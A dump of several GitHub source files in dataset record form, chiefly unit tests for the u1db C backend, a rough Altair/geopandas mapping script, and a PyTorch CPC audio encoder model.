unittest.main()\n","repo_name":"huragok/Practice","sub_path":"ITA/3_Data Structrues/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74773958819","text":"import simplejson\nfrom u1db import (\n Document,\n errors,\n tests,\n )\nfrom u1db.tests import c_backend_wrapper, c_backend_error\nfrom u1db.tests.test_remote_sync_target import (\n http_server_def,\n oauth_http_server_def,\n )\n\n\nclass TestCDatabaseExists(tests.TestCase):\n\n def test_exists(self):\n if c_backend_wrapper is None:\n self.fail(\"Could not import the c_backend_wrapper module.\"\n \" Was it compiled properly?\\n%s\" % (c_backend_error,))\n\n\n# Rather than lots of 
failing tests, we have the above check to test that the\n# module exists, and all these tests just get skipped\nclass BackendTests(tests.TestCase):\n\n def setUp(self):\n super(BackendTests, self).setUp()\n if c_backend_wrapper is None:\n self.skipTest(\"The c_backend_wrapper could not be imported\")\n\n\nclass TestCDatabase(BackendTests):\n\n def test_exists(self):\n if c_backend_wrapper is None:\n self.fail(\"Could not import the c_backend_wrapper module.\"\n \" Was it compiled properly?\")\n db = c_backend_wrapper.CDatabase(':memory:')\n self.assertEqual(':memory:', db._filename)\n\n def test__is_closed(self):\n db = c_backend_wrapper.CDatabase(':memory:')\n self.assertTrue(db._sql_is_open())\n db.close()\n self.assertFalse(db._sql_is_open())\n\n def test__run_sql(self):\n db = c_backend_wrapper.CDatabase(':memory:')\n self.assertTrue(db._sql_is_open())\n self.assertEqual([], db._run_sql('CREATE TABLE test (id INTEGER)'))\n self.assertEqual([], db._run_sql('INSERT INTO test VALUES (1)'))\n self.assertEqual([('1',)], db._run_sql('SELECT * FROM test'))\n\n def test__get_generation(self):\n db = c_backend_wrapper.CDatabase(':memory:')\n self.assertEqual(0, db._get_generation())\n db.create_doc(tests.simple_doc)\n self.assertEqual(1, db._get_generation())\n\n def test__get_generation_info(self):\n db = c_backend_wrapper.CDatabase(':memory:')\n self.assertEqual((0, None), db._get_generation_info())\n db.create_doc(tests.simple_doc)\n info = db._get_generation_info()\n self.assertEqual(1, info[0])\n self.assertTrue(info[1].startswith('T-'))\n\n def test__set_replica_uid(self):\n db = c_backend_wrapper.CDatabase(':memory:')\n self.assertIsNot(None, db._replica_uid)\n db._set_replica_uid('foo')\n self.assertEqual([('foo',)], db._run_sql(\n \"SELECT value FROM u1db_config WHERE name='replica_uid'\"))\n\n def test_default_replica_uid(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n self.assertIsNot(None, self.db._replica_uid)\n self.assertEqual(32, len(self.db._replica_uid))\n # casting to an int from the uid *is* the check for correct behavior.\n int(self.db._replica_uid, 16)\n\n def test_get_conflicts_with_borked_data(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n # We add an entry to conflicts, but not to documents, which is an\n # invalid situation\n self.db._run_sql(\"INSERT INTO conflicts\"\n \" VALUES ('doc-id', 'doc-rev', '{}')\")\n self.assertRaises(Exception, self.db.get_doc_conflicts, 'doc-id')\n\n def test_create_index_list(self):\n # We manually poke data into the DB, so that we test just the \"get_doc\"\n # code, rather than also testing the index management code.\n self.db = c_backend_wrapper.CDatabase(':memory:')\n doc = self.db.create_doc(tests.simple_doc)\n self.db.create_index_list(\"key-idx\", [\"key\"])\n docs = self.db.get_from_index('key-idx', 'value')\n self.assertEqual([doc], docs)\n\n def test_create_index_list_on_non_ascii_field_name(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n doc = self.db.create_doc(simplejson.dumps({u'\\xe5': 'value'}))\n self.db.create_index_list('test-idx', [u'\\xe5'])\n self.assertEqual([doc], self.db.get_from_index('test-idx', 'value'))\n\n def test_list_indexes_with_non_ascii_field_names(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n self.db.create_index_list('test-idx', [u'\\xe5'])\n self.assertEqual(\n [('test-idx', [u'\\xe5'])], self.db.list_indexes())\n\n def test_create_index_evaluates_it(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n doc = 
self.db.create_doc(tests.simple_doc)\n self.db.create_index_list('test-idx', ['key'])\n self.assertEqual([doc], self.db.get_from_index('test-idx', 'value'))\n\n def test_wildcard_matches_unicode_value(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n doc = self.db.create_doc(simplejson.dumps({\"key\": u\"valu\\xe5\"}))\n self.db.create_index_list('test-idx', ['key'])\n self.assertEqual([doc], self.db.get_from_index('test-idx', '*'))\n\n def test_create_index_fails_if_name_taken(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n self.db.create_index_list('test-idx', ['key'])\n self.assertRaises(errors.IndexNameTakenError,\n self.db.create_index_list,\n 'test-idx', ['stuff'])\n\n def test_create_index_does_not_fail_if_name_taken_with_same_index(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n self.db.create_index_list('test-idx', ['key'])\n self.db.create_index_list('test-idx', ['key'])\n self.assertEqual([('test-idx', ['key'])], self.db.list_indexes())\n\n def test_create_index_after_deleting_document(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n doc = self.db.create_doc(tests.simple_doc)\n doc2 = self.db.create_doc(tests.simple_doc)\n self.db.delete_doc(doc2)\n self.db.create_index_list('test-idx', ['key'])\n self.assertEqual([doc], self.db.get_from_index('test-idx', 'value'))\n\n def test_get_from_index(self):\n # We manually poke data into the DB, so that we test just the \"get_doc\"\n # code, rather than also testing the index management code.\n self.db = c_backend_wrapper.CDatabase(':memory:')\n doc = self.db.create_doc(tests.simple_doc)\n self.db.create_index(\"key-idx\", \"key\")\n docs = self.db.get_from_index('key-idx', 'value')\n self.assertEqual([doc], docs)\n\n def test_get_from_index_list(self):\n # We manually poke data into the DB, so that we test just the \"get_doc\"\n # code, rather than also testing the index management code.\n self.db = c_backend_wrapper.CDatabase(':memory:')\n doc = self.db.create_doc(tests.simple_doc)\n self.db.create_index(\"key-idx\", \"key\")\n docs = self.db.get_from_index_list('key-idx', ['value'])\n self.assertEqual([doc], docs)\n\n def test_get_from_index_list_multi(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n content = '{\"key\": \"value\", \"key2\": \"value2\"}'\n doc = self.db.create_doc(content)\n self.db.create_index('test-idx', 'key', 'key2')\n self.assertEqual(\n [doc],\n self.db.get_from_index_list('test-idx', ['value', 'value2']))\n\n def test_get_from_index_list_multi_ordered(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n doc1 = self.db.create_doc('{\"key\": \"value3\", \"key2\": \"value4\"}')\n doc2 = self.db.create_doc('{\"key\": \"value2\", \"key2\": \"value3\"}')\n doc3 = self.db.create_doc('{\"key\": \"value2\", \"key2\": \"value2\"}')\n doc4 = self.db.create_doc('{\"key\": \"value1\", \"key2\": \"value1\"}')\n self.db.create_index('test-idx', 'key', 'key2')\n self.assertEqual(\n [doc4, doc3, doc2, doc1],\n self.db.get_from_index_list('test-idx', ['v*', '*']))\n\n def test_get_from_index_2(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n doc = self.db.create_doc(tests.nested_doc)\n self.db.create_index(\"multi-idx\", \"key\", \"sub.doc\")\n docs = self.db.get_from_index('multi-idx', 'value', 'underneath')\n self.assertEqual([doc], docs)\n\n def test_get_index_keys(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n self.db.create_doc(tests.simple_doc)\n self.db.create_index(\"key-idx\", \"key\")\n keys = 
self.db.get_index_keys('key-idx')\n self.assertEqual([(\"value\",)], keys)\n\n def test__query_init_one_field(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n self.db.create_index(\"key-idx\", \"key\")\n query = self.db._query_init(\"key-idx\")\n self.assertEqual(\"key-idx\", query.index_name)\n self.assertEqual(1, query.num_fields)\n self.assertEqual([\"key\"], query.fields)\n\n def test__query_init_two_fields(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n self.db.create_index(\"two-idx\", \"key\", \"key2\")\n query = self.db._query_init(\"two-idx\")\n self.assertEqual(\"two-idx\", query.index_name)\n self.assertEqual(2, query.num_fields)\n self.assertEqual([\"key\", \"key2\"], query.fields)\n\n def assertFormatQueryEquals(self, expected, wildcards, fields):\n val, w = c_backend_wrapper._format_query(fields)\n self.assertEqual(expected, val)\n self.assertEqual(wildcards, w)\n\n def test__format_query(self):\n self.assertFormatQueryEquals(\n \"SELECT d0.doc_id FROM document_fields d0\"\n \" WHERE d0.field_name = ? AND d0.value = ? ORDER BY d0.value\",\n [0], [\"1\"])\n self.assertFormatQueryEquals(\n \"SELECT d0.doc_id\"\n \" FROM document_fields d0, document_fields d1\"\n \" WHERE d0.field_name = ? AND d0.value = ?\"\n \" AND d0.doc_id = d1.doc_id\"\n \" AND d1.field_name = ? AND d1.value = ?\"\n \" ORDER BY d0.value, d1.value\",\n [0, 0], [\"1\", \"2\"])\n self.assertFormatQueryEquals(\n \"SELECT d0.doc_id\"\n \" FROM document_fields d0, document_fields d1, document_fields d2\"\n \" WHERE d0.field_name = ? AND d0.value = ?\"\n \" AND d0.doc_id = d1.doc_id\"\n \" AND d1.field_name = ? AND d1.value = ?\"\n \" AND d0.doc_id = d2.doc_id\"\n \" AND d2.field_name = ? AND d2.value = ?\"\n \" ORDER BY d0.value, d1.value, d2.value\",\n [0, 0, 0], [\"1\", \"2\", \"3\"])\n\n def test__format_query_wildcard(self):\n self.assertFormatQueryEquals(\n \"SELECT d0.doc_id FROM document_fields d0\"\n \" WHERE d0.field_name = ? AND d0.value NOT NULL ORDER BY d0.value\",\n [1], [\"*\"])\n self.assertFormatQueryEquals(\n \"SELECT d0.doc_id\"\n \" FROM document_fields d0, document_fields d1\"\n \" WHERE d0.field_name = ? AND d0.value = ?\"\n \" AND d0.doc_id = d1.doc_id\"\n \" AND d1.field_name = ? AND d1.value NOT NULL\"\n \" ORDER BY d0.value, d1.value\",\n [0, 1], [\"1\", \"*\"])\n\n def test__format_query_glob(self):\n self.assertFormatQueryEquals(\n \"SELECT d0.doc_id FROM document_fields d0\"\n \" WHERE d0.field_name = ? AND d0.value GLOB ? 
ORDER BY d0.value\",\n [2], [\"1*\"])\n\n\nclass TestCSyncTarget(BackendTests):\n\n def setUp(self):\n super(TestCSyncTarget, self).setUp()\n self.db = c_backend_wrapper.CDatabase(':memory:')\n self.st = self.db.get_sync_target()\n\n def test_attached_to_db(self):\n self.assertEqual(\n self.db._replica_uid, self.st.get_sync_info(\"misc\")[0])\n\n def test_get_sync_exchange(self):\n exc = self.st._get_sync_exchange(\"source-uid\", 10)\n self.assertIsNot(None, exc)\n\n def test_sync_exchange_insert_doc_from_source(self):\n exc = self.st._get_sync_exchange(\"source-uid\", 5)\n doc = c_backend_wrapper.make_document('doc-id', 'replica:1',\n tests.simple_doc)\n self.assertEqual([], exc.get_seen_ids())\n exc.insert_doc_from_source(doc, 10, 'T-sid')\n self.assertGetDoc(self.db, 'doc-id', 'replica:1', tests.simple_doc,\n False)\n self.assertEqual((10, 'T-sid'),\n self.db._get_sync_gen_info('source-uid'))\n self.assertEqual(['doc-id'], exc.get_seen_ids())\n\n def test_sync_exchange_conflicted_doc(self):\n doc = self.db.create_doc(tests.simple_doc)\n exc = self.st._get_sync_exchange(\"source-uid\", 5)\n doc2 = c_backend_wrapper.make_document(doc.doc_id, 'replica:1',\n tests.nested_doc)\n self.assertEqual([], exc.get_seen_ids())\n # The insert should be rejected and the doc_id not considered 'seen'\n exc.insert_doc_from_source(doc2, 10, 'T-sid')\n self.assertGetDoc(\n self.db, doc.doc_id, doc.rev, tests.simple_doc, False)\n self.assertEqual([], exc.get_seen_ids())\n\n def test_sync_exchange_find_doc_ids(self):\n doc = self.db.create_doc(tests.simple_doc)\n exc = self.st._get_sync_exchange(\"source-uid\", 0)\n self.assertEqual(0, exc.target_gen)\n exc.find_doc_ids_to_return()\n doc_id = exc.get_doc_ids_to_return()[0]\n self.assertEqual(\n (doc.doc_id, 1), doc_id[:-1])\n self.assertTrue(doc_id[-1].startswith('T-'))\n self.assertEqual(1, exc.target_gen)\n\n def test_sync_exchange_find_doc_ids_not_including_recently_inserted(self):\n doc1 = self.db.create_doc(tests.simple_doc)\n doc2 = self.db.create_doc(tests.nested_doc)\n exc = self.st._get_sync_exchange(\"source-uid\", 0)\n doc3 = c_backend_wrapper.make_document(doc1.doc_id,\n doc1.rev + \"|zreplica:2\", tests.simple_doc)\n exc.insert_doc_from_source(doc3, 10, 'T-sid')\n exc.find_doc_ids_to_return()\n self.assertEqual(\n (doc2.doc_id, 2), exc.get_doc_ids_to_return()[0][:-1])\n self.assertEqual(3, exc.target_gen)\n\n def test_sync_exchange_return_docs(self):\n returned = []\n\n def return_doc_cb(doc, gen, trans_id):\n returned.append((doc, gen, trans_id))\n\n doc1 = self.db.create_doc(tests.simple_doc)\n exc = self.st._get_sync_exchange(\"source-uid\", 0)\n exc.find_doc_ids_to_return()\n exc.return_docs(return_doc_cb)\n self.assertEqual((doc1, 1), returned[0][:-1])\n\n def test_sync_exchange_doc_ids(self):\n doc1 = self.db.create_doc(tests.simple_doc, doc_id='doc-1')\n db2 = c_backend_wrapper.CDatabase(':memory:')\n doc2 = db2.create_doc(tests.nested_doc, doc_id='doc-2')\n returned = []\n\n def return_doc_cb(doc, gen, trans_id):\n returned.append((doc, gen, trans_id))\n\n val = self.st.sync_exchange_doc_ids(\n db2, [(doc2.doc_id, 1, 'T-sid')], 0, return_doc_cb)\n last_trans_id = self.db._get_transaction_log()[-1][1]\n self.assertEqual(2, self.db._get_generation())\n self.assertEqual((2, last_trans_id), val)\n self.assertGetDoc(self.db, doc2.doc_id, doc2.rev, tests.nested_doc,\n False)\n self.assertEqual((doc1, 1), returned[0][:-1])\n\n\nclass TestCHTTPSyncTarget(BackendTests):\n\n def test_format_sync_url(self):\n target = 
c_backend_wrapper.create_http_sync_target(\"http://base_url\")\n self.assertEqual(\"http://base_url/sync-from/replica-uid\",\n c_backend_wrapper._format_sync_url(target, \"replica-uid\"))\n\n def test_format_sync_url_escapes(self):\n # The base_url should not get munged (we assume it is already a\n # properly formed URL), but the replica-uid should get properly escaped\n target = c_backend_wrapper.create_http_sync_target(\n \"http://host/base%2Ctest/\")\n self.assertEqual(\"http://host/base%2Ctest/sync-from/replica%2Cuid\",\n c_backend_wrapper._format_sync_url(target, \"replica,uid\"))\n\n def test_format_refuses_non_http(self):\n db = c_backend_wrapper.CDatabase(':memory:')\n target = db.get_sync_target()\n self.assertRaises(RuntimeError,\n c_backend_wrapper._format_sync_url, target, 'replica,uid')\n\n def test_oauth_credentials(self):\n target = c_backend_wrapper.create_oauth_http_sync_target(\n \"http://host/base%2Ctest/\",\n 'consumer-key', 'consumer-secret', 'token-key', 'token-secret')\n auth = c_backend_wrapper._get_oauth_authorization(target,\n \"GET\", \"http://host/base%2Ctest/sync-from/abcd-efg\")\n self.assertIsNot(None, auth)\n self.assertTrue(auth.startswith('Authorization: OAuth realm=\"\", '))\n self.assertNotIn('http://host/base', auth)\n self.assertIn('oauth_nonce=\"', auth)\n self.assertIn('oauth_timestamp=\"', auth)\n self.assertIn('oauth_consumer_key=\"consumer-key\"', auth)\n self.assertIn('oauth_signature_method=\"HMAC-SHA1\"', auth)\n self.assertIn('oauth_version=\"1.0\"', auth)\n self.assertIn('oauth_token=\"token-key\"', auth)\n self.assertIn('oauth_signature=\"', auth)\n\n\nclass TestSyncCtoHTTPViaC(tests.TestCaseWithServer):\n\n server_def = staticmethod(http_server_def)\n\n def setUp(self):\n super(TestSyncCtoHTTPViaC, self).setUp()\n if c_backend_wrapper is None:\n self.skipTest(\"The c_backend_wrapper could not be imported\")\n self.startServer()\n\n def test_trivial_sync(self):\n mem_db = self.request_state._create_database('test.db')\n mem_doc = mem_db.create_doc(tests.nested_doc)\n url = self.getURL('test.db')\n target = c_backend_wrapper.create_http_sync_target(url)\n db = c_backend_wrapper.CDatabase(':memory:')\n doc = db.create_doc(tests.simple_doc)\n c_backend_wrapper.sync_db_to_target(db, target)\n self.assertGetDoc(mem_db, doc.doc_id, doc.rev, doc.get_json(), False)\n self.assertGetDoc(db, mem_doc.doc_id, mem_doc.rev, mem_doc.get_json(),\n False)\n\n\nclass TestSyncCtoOAuthHTTPViaC(tests.TestCaseWithServer):\n\n server_def = staticmethod(oauth_http_server_def)\n\n def setUp(self):\n super(TestSyncCtoOAuthHTTPViaC, self).setUp()\n if c_backend_wrapper is None:\n self.skipTest(\"The c_backend_wrapper could not be imported\")\n self.startServer()\n\n def test_trivial_sync(self):\n mem_db = self.request_state._create_database('test.db')\n mem_doc = mem_db.create_doc(tests.nested_doc)\n url = self.getURL('~/test.db')\n target = c_backend_wrapper.create_oauth_http_sync_target(url,\n tests.consumer1.key, tests.consumer1.secret,\n tests.token1.key, tests.token1.secret)\n db = c_backend_wrapper.CDatabase(':memory:')\n doc = db.create_doc(tests.simple_doc)\n c_backend_wrapper.sync_db_to_target(db, target)\n self.assertGetDoc(mem_db, doc.doc_id, doc.rev, doc.get_json(), False)\n self.assertGetDoc(db, mem_doc.doc_id, mem_doc.rev, mem_doc.get_json(),\n False)\n\n\nclass TestVectorClock(BackendTests):\n\n def create_vcr(self, rev):\n return c_backend_wrapper.VectorClockRev(rev)\n\n def test_parse_empty(self):\n self.assertEqual('VectorClockRev()',\n 
repr(self.create_vcr('')))\n\n def test_parse_invalid(self):\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('x')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('x:a')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('y:1|x:a')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('x:a|y:1')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('y:1|x:2a')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('y:1||')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('y:1|')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('y:1|x:2|')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('y:1|x:2|:')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('y:1|x:2|m:')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('y:1|x:|m:3')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('y:1|:|m:3')))\n\n def test_parse_single(self):\n self.assertEqual('VectorClockRev(test:1)',\n repr(self.create_vcr('test:1')))\n\n def test_parse_multi(self):\n self.assertEqual('VectorClockRev(test:1|z:2)',\n repr(self.create_vcr('test:1|z:2')))\n self.assertEqual('VectorClockRev(ab:1|bc:2|cd:3|de:4|ef:5)',\n repr(self.create_vcr('ab:1|bc:2|cd:3|de:4|ef:5')))\n self.assertEqual('VectorClockRev(a:2|b:1)',\n repr(self.create_vcr('b:1|a:2')))\n\n\nclass TestCDocument(BackendTests):\n\n def make_document(self, *args, **kwargs):\n return c_backend_wrapper.make_document(*args, **kwargs)\n\n def test_create(self):\n self.make_document('doc-id', 'uid:1', tests.simple_doc)\n\n def assertPyDocEqualCDoc(self, *args, **kwargs):\n cdoc = self.make_document(*args, **kwargs)\n pydoc = Document(*args, **kwargs)\n self.assertEqual(pydoc, cdoc)\n self.assertEqual(cdoc, pydoc)\n\n def test_cmp_to_pydoc_equal(self):\n self.assertPyDocEqualCDoc('doc-id', 'uid:1', tests.simple_doc)\n self.assertPyDocEqualCDoc('doc-id', 'uid:1', tests.simple_doc,\n has_conflicts=False)\n self.assertPyDocEqualCDoc('doc-id', 'uid:1', tests.simple_doc,\n has_conflicts=True)\n\n def test_cmp_to_pydoc_not_equal_conflicts(self):\n cdoc = self.make_document('doc-id', 'uid:1', tests.simple_doc)\n pydoc = Document('doc-id', 'uid:1', tests.simple_doc,\n has_conflicts=True)\n self.assertNotEqual(cdoc, pydoc)\n self.assertNotEqual(pydoc, cdoc)\n\n def test_cmp_to_pydoc_not_equal_doc_id(self):\n cdoc = self.make_document('doc-id', 'uid:1', tests.simple_doc)\n pydoc = Document('doc2-id', 'uid:1', tests.simple_doc)\n self.assertNotEqual(cdoc, pydoc)\n self.assertNotEqual(pydoc, cdoc)\n\n def test_cmp_to_pydoc_not_equal_doc_rev(self):\n cdoc = self.make_document('doc-id', 'uid:1', tests.simple_doc)\n pydoc = Document('doc-id', 'uid:2', tests.simple_doc)\n self.assertNotEqual(cdoc, pydoc)\n self.assertNotEqual(pydoc, cdoc)\n\n def test_cmp_to_pydoc_not_equal_content(self):\n cdoc = self.make_document('doc-id', 'uid:1', tests.simple_doc)\n pydoc = Document('doc-id', 'uid:1', tests.nested_doc)\n self.assertNotEqual(cdoc, pydoc)\n self.assertNotEqual(pydoc, cdoc)\n\n\nclass TestUUID(BackendTests):\n\n def test_uuid4_conformance(self):\n uuids = set()\n for i in range(20):\n uuid = c_backend_wrapper.generate_hex_uuid()\n self.assertIsInstance(uuid, str)\n self.assertEqual(32, len(uuid))\n # This will raise ValueError if it isn't a valid hex string\n long(uuid, 16)\n # Version 4 uuids have 2 other requirements, the high 4 bits of the\n # seventh byte are always '0x4', and the 
middle bits of byte 9 are\n # always set\n self.assertEqual('4', uuid[12])\n self.assertTrue(uuid[16] in '89ab')\n self.assertTrue(uuid not in uuids)\n uuids.add(uuid)\n","repo_name":"Kazade/Tasks","sub_path":"u1dbrepo/u1db/tests/test_c_backend.py","file_name":"test_c_backend.py","file_ext":"py","file_size_in_byte":23744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"21880953033","text":"from pathlib import Path\ndata_folder = Path('C:/Users/langzx/Desktop/github/DCM')\n#data_folder = Path('/Users/ellelang/Documents/github/DCM/data')\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport altair as alt\nfrom vega_datasets import data\nimport geopandas as gpd\nfrom geopandas import GeoSeries, GeoDataFrame\n\n\ndata_folder = Path('C:/Users/langzx/Desktop/github/DCM')\n#data_folder = Path('/Users/ellelang/Documents/github/DCM')\nMRB = gpd.read_file(data_folder/\"shapefilesMRB/3statesMRBclipped1.shp\")\nMRB.crs\nMRB.plot(color='white', edgecolor='grey')\nMRB.columns\nMRB.NAME \n\nMRB.loc[(MRB.STATE_NAME == 'South Dakota')&(MRB.NAME == 'Grant'), 'NAME'] = 'Grant_sd'\n\n#MRB = MRB.loc[MRB['STATE_NAME'] == 'Minnesota']\n\n\ncost_counties = pd.read_csv(data_folder/\"data/cost_region1027.csv\")\nMRB_counties = pd.merge(MRB, cost_counties,how='left',left_on='NAME', right_on='County')\nMRB_counties.columns\n#len(MRB_counties.geometry)\n# regionname = cost.Region.unique().tolist()\n# regionname_sort = ['Northeast',\n# 'Northwest',\n# 'Westcentral',\n# 'Southcentral',\n# 'Southwest',\n# 'Iowa',\n# 'South Dakota'\n# ]\nairports = data.airports.url\nairports\npoints = alt.Chart(airports).transform_aggregate(\n latitude='mean(latitude)',\n longitude='mean(longitude)',\n count='count()',\n groupby=['state']\n)\npoints.show()\n\n\nstates = alt.topo_feature(MRB_counties, feature='STATE_NAME')\n\nbackground = alt.Chart(MRB_counties).mark_geoshape(\n fill='lightgray',\n stroke='white'\n).properties(\n width=500,\n height=300\n).project('albersUsa')\n\nbackground.show()\n\n\n\ndf1 = cost.melt(id_vars=['County'], \n value_vars=['WLD', 'CC', 'NM', 'ASC_obs'],\n var_name='Types', value_name='WTAs')\n\ndf1.head(3)\nalt.renderers.enable('altair_viewer')\nbar = alt.Chart(df1).mark_bar().encode(\n x='County',\n y='WTAs',\n color='Types'\n )\n\nbar.show()\ndf2 = pd.merge(df1, MRB, how='left', left_on='County', right_on='NAME')\ndf2.lon\ndf2.columns\n\nbackground + bars\n\n\n\n\ndf2 = df2[['County', 'Types' ,'WTAs','lat','lon']]\n# airport positions on background\npoints = alt.Chart(df2).transform_aggregate(\n latitude='mean(lat)',\n longitude='mean(lon)',\n count='count()',\n groupby=['County']\n).mark_circle().encode(\n longitude='longitude:Q',\n latitude='latitude:Q',\n size=alt.Size('count:Q', title='Number of Airports'),\n color=alt.value('steelblue'),\n tooltip=['County:N','count:Q']\n).properties(\n title='Number of airports in US'\n)\npoints.show()\n\n\nbars = alt.Chart(df2).transform_aggregate(\n latitude='mean(lat)',\n longitude='mean(lon)',\n groupby=['County'],\n totalwta = 'sum(WTAs)'\n).mark_circle(size=78).encode(\n longitude='longitude:Q',\n latitude='latitude:Q',\n color='totalwta:Q',\n \n #color=alt.value('steelblue'),\n tooltip=['County:N','totalwta:Q']\n).properties(\n title='Counties WTAs (WLD+CC+NM+ASC)'\n)\n\n#bars.show()\n\ntotal = background + bars \ntotal.show()\n\n\n\nmark_bar().encode(\n longitude='longitude:Q',\n latitude='latitude:Q',\n x='County',\n y='WTAs' \n 
)\n\nbars.show()\n","repo_name":"ellelang/DCM","sub_path":"code/python/spatialtry.py","file_name":"spatialtry.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26863640042","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass IDModule(nn.Module):\n def __init__(self, *args, **kwargs):\n super(IDModule, self).__init__()\n\n def forward(self, x):\n return x\n\n\nclass ChannelNorm(nn.Module):\n def __init__(self, numFeatures, epsilon=1e-05, affine=True):\n super(ChannelNorm, self).__init__()\n if affine:\n self.weight = nn.parameter.Parameter(torch.Tensor(1, numFeatures, 1))\n self.bias = nn.parameter.Parameter(torch.Tensor(1, numFeatures, 1))\n else:\n self.weight = None\n self.bias = None\n self.epsilon = epsilon\n self.p = 0\n self.affine = affine\n self.reset_parameters()\n\n def reset_parameters(self):\n if self.affine:\n torch.nn.init.ones_(self.weight)\n torch.nn.init.zeros_(self.bias)\n\n def forward(self, x):\n cumMean = x.mean(dim=1, keepdim=True)\n cumVar = x.var(dim=1, keepdim=True)\n x = (x - cumMean) * torch.rsqrt(cumVar + self.epsilon)\n\n if self.weight is not None:\n x = x * self.weight + self.bias\n return x\n\n\nclass CPCEncoder(nn.Module):\n def __init__(self, sizeHidden=512, normMode=\"layerNorm\"):\n super(CPCEncoder, self).__init__()\n\n validModes = [\"batchNorm\", \"instanceNorm\", \"ID\", \"layerNorm\"]\n if normMode not in validModes:\n raise ValueError(f\"Norm mode must be in {validModes}\")\n\n if normMode == \"instanceNorm\":\n\n def normLayer(x):\n return nn.InstanceNorm1d(x, affine=True)\n\n elif normMode == \"ID\":\n normLayer = IDModule\n elif normMode == \"layerNorm\":\n normLayer = ChannelNorm\n else:\n normLayer = nn.BatchNorm1d\n\n self.dimEncoded = sizeHidden\n self.conv0 = nn.Conv1d(1, sizeHidden, 10, stride=5, padding=3)\n self.batchNorm0 = normLayer(sizeHidden)\n self.conv1 = nn.Conv1d(sizeHidden, sizeHidden, 8, stride=4, padding=2)\n self.batchNorm1 = normLayer(sizeHidden)\n self.conv2 = nn.Conv1d(sizeHidden, sizeHidden, 4, stride=2, padding=1)\n self.batchNorm2 = normLayer(sizeHidden)\n self.conv3 = nn.Conv1d(sizeHidden, sizeHidden, 4, stride=2, padding=1)\n self.batchNorm3 = normLayer(sizeHidden)\n self.conv4 = nn.Conv1d(sizeHidden, sizeHidden, 4, stride=2, padding=1)\n self.batchNorm4 = normLayer(sizeHidden)\n self.DOWNSAMPLING = 160\n\n def getDimOutput(self):\n return self.conv4.out_channels\n\n def forward(self, x):\n x = F.relu(self.batchNorm0(self.conv0(x)))\n x = F.relu(self.batchNorm1(self.conv1(x)))\n x = F.relu(self.batchNorm2(self.conv2(x)))\n x = F.relu(self.batchNorm3(self.conv3(x)))\n x = F.relu(self.batchNorm4(self.conv4(x)))\n return x\n\n\nclass CPCAR(nn.Module):\n def __init__(\n self, dimEncoded, dimOutput, keepHidden, nLevelsGRU, mode=\"GRU\", reverse=False\n ):\n super(CPCAR, self).__init__()\n self.RESIDUAL_STD = 0.1\n\n if mode == \"LSTM\":\n self.baseNet = nn.LSTM(\n dimEncoded, dimOutput, num_layers=nLevelsGRU, batch_first=True\n )\n elif mode == \"RNN\":\n self.baseNet = nn.RNN(\n dimEncoded, dimOutput, num_layers=nLevelsGRU, batch_first=True\n )\n else:\n self.baseNet = nn.GRU(\n dimEncoded, dimOutput, num_layers=nLevelsGRU, batch_first=True\n )\n\n self.hidden = None\n self.keepHidden = keepHidden\n self.reverse = reverse\n\n def getDimOutput(self):\n return self.baseNet.hidden_size\n\n def forward(self, x):\n if self.reverse:\n x = torch.flip(x, [1])\n try:\n 
self.baseNet.flatten_parameters()\n except RuntimeError:\n pass\n x, h = self.baseNet(x, self.hidden)\n if self.keepHidden:\n if isinstance(h, tuple):\n self.hidden = tuple(x.detach() for x in h)\n else:\n self.hidden = h.detach()\n\n # For better modularity, a sequence's order should be preserved\n # by each module\n if self.reverse:\n x = torch.flip(x, [1])\n return x\n\n\nclass CPCModel(nn.Module):\n def __init__(self, encoder, AR):\n super(CPCModel, self).__init__()\n self.gEncoder = encoder\n self.gAR = AR\n\n def forward(self, batchData, label):\n encodedData = self.gEncoder(batchData).permute(0, 2, 1)\n cFeature = self.gAR(encodedData)\n return cFeature, encodedData, label\n","repo_name":"neurocode-ai/neurocode","sub_path":"neurocode/models/cpc.py","file_name":"cpc.py","file_ext":"py","file_size_in_byte":4624,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"41298817571","text":"import argparse\nfrom collections import defaultdict\nfrom lxml import etree\nfrom time import sleep\nfrom datetime import date, datetime, timedelta\nimport urllib3\nimport requests as r\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import 